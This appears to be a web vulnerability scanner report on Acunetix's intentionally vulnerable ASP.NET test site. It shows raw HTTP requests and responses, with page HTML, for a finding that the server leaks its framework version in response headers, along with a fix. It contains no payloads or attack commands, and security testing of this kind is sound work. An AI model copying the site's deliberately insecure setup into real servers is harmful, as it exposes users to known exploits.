<rss version="2.0"> <channel> <title>Acunetix testaspnet</title> <link>http://testaspnet.acunetix.com/</link> <description> This is the syndication feed for testaspnet.acunetix.com. </description> <item> <title>Acunetix Vulnerability Scanner Now With Network Security Scans</title> <description> Seamless OpenVAS integration now also available on Windows and Linux </description> <link> http://testaspnet.acunetix.com/ReadNews.aspx?id=0 </link> <author>admin </author> <pubDate> Thu, 16 May 2019 12:32:30 GMT </pubDate> </item> <item> <title>Acunetix Web Vulnerability Scanner beta released!</title> <description> 26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/. </description> <link> http://testaspnet.acunetix.com/ReadNews.aspx?id=3 </link> <author>admin </author> <pubDate> Tue, 08 Nov 2005 11:37:35 GMT </pubDate> </item> <item> <title>Web attacks - can your web applications withstand the force?</title> <description> 21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed. </description> <link> http://testaspnet.acunetix.com/ReadNews.aspx?id=2 </link> <author>admin </author> <pubDate> Tue, 08 Nov 2005 11:35:22 GMT </pubDate> </item> </channel> </rss>Evidence 2.0.50727Solution Configure the server so it will not return those headers.
GET http://testaspnet.vulnweb.com/Signup.aspx
Alert tags Alert description Server leaks information via "X-AspNet-Version"/"X-AspNetMvc-Version" HTTP response header field(s).
Other info An attacker can use this information to exploit known vulnerabilities.
Request Request line and header section (315 bytes)
GET http://testaspnet.vulnweb.com/Signup.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232Request body (0 bytes)
Response Status line and header section (222 bytes)
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Mon, 25 Jul 2022 13:05:17 GMT Content-Length: 12954Response body (12954 bytes)
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>Signup</title> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="Signup.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTY0MzI4NjU4Mw9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZLWF2wpV006tz0eDdoKfDbx+i81I" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit || (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="36F90C25" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWgK42oW1DwLStq24BwK3jsrkBALF97vxAQK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q8wYbzXe+sXxDpSfVp4SwbIP85RvA==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> <TABLE id="Table2" cellSpacing="0" cellPadding="10" width="300" border="0" class="FramedForm" align="center"> <TR> <TD>Username:</TD> <TD> <input name="tbUsername" type="text" id="tbUsername" class="Login" /></TD> </TR> <TR> <TD>Password:</TD> <TD> <input name="tbPassword" type="password" id="tbPassword" class="Login" /></TD> </TR> <TR> <TD></TD> <TD align="right"> <input type="submit" name="btnSignup" value="Sign me up" id="btnSignup" /></TD> </TR> </TABLE> <BR> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>Evidence 2.0.50727Solution Configure the server so it will not return those headers.
POST http://testaspnet.vulnweb.com/about.aspx
Alert tags Alert description Server leaks information via "X-AspNet-Version"/"X-AspNetMvc-Version" HTTP response header field(s).
Other info An attacker can use this information to exploit known vulnerabilities.
Request Request line and header section (397 bytes)
POST http://testaspnet.vulnweb.com/about.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/about.aspx Content-Length: 1027 Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232Request body (1027 bytes)
__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZLDaiLtIJBFGHdHW8BBidJDZ856t&__VIEWSTATEGENERATOR=E809BCA5&__EVENTVALIDATION=%2FwEWVwKqq9H0CQK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ%2F2grLtTL%2BjO092JULZB%2B%2Bks9UGJw%3D%3DResponse Status line and header section (222 bytes)
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Mon, 25 Jul 2022 13:05:19 GMT Content-Length: 14467Response body (14467 bytes)
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>About</title> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="about.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZLDaiLtIJBFGHdHW8BBidJDZ856t" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit || (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="E809BCA5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKqq9H0CQK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q/2grLtTL+jO092JULZB++ks9UGJw==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> <h1>About this website</h1> <p>The website was built with the intention to test the Acunetix Web Vulnerability Scanner. For this reason this website have <b>lot of bugs</b> to demonstrate the forementioned software's capabilities to find those bugs.</p> <p><b>Please DO NOT use this website as a blog or news site. DO NOT post any sensitive information on this site. This includes e-mail addresses or real names.</b></p> <h1>About Acunetix</h1> <P><B>Combating the web vulnerability threat<BR> </B>Securing a company's web applications is today's most overlooked aspect of securing the enterprise. Web application hacking is on the rise with as many as 75% of cyber attacks done at web application level or via the web. Most corporations have secured their data at the network level, but have overlooked the crucial step of checking whether their web applications are vulnerable to attack. Web applications, which often have a direct line into the company's most valuable data assets, are online 24/7, completely unprotected by a firewall and therefore easy prey for attackers.</P> <P>Acunetix was founded with this threat in mind. We realised the only way to combat web site hacking was to develop an automated tool that could help companies scan their web applications for vulnerabilities. In July 2005, Acunetix Web Vulnerability Scanner was released - a tool that crawls the website for vulnerabilities to SQL injection, cross site scripting and other web attacks before hackers do.</P> <P>The Acunetix development team consists of highly experienced security developers who have each spent years developing network security scanning software prior to starting development on Acunetix WVS. The management team is backed by years of experience marketing and selling security software.</P> <P>Acunetix is a privately held company with its <A href="https://www.acunetix.com/company/contact/"> offices</A> in Malta, US and the UK. </P> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>Evidence 2.0.50727Solution Configure the server so it will not return those headers.
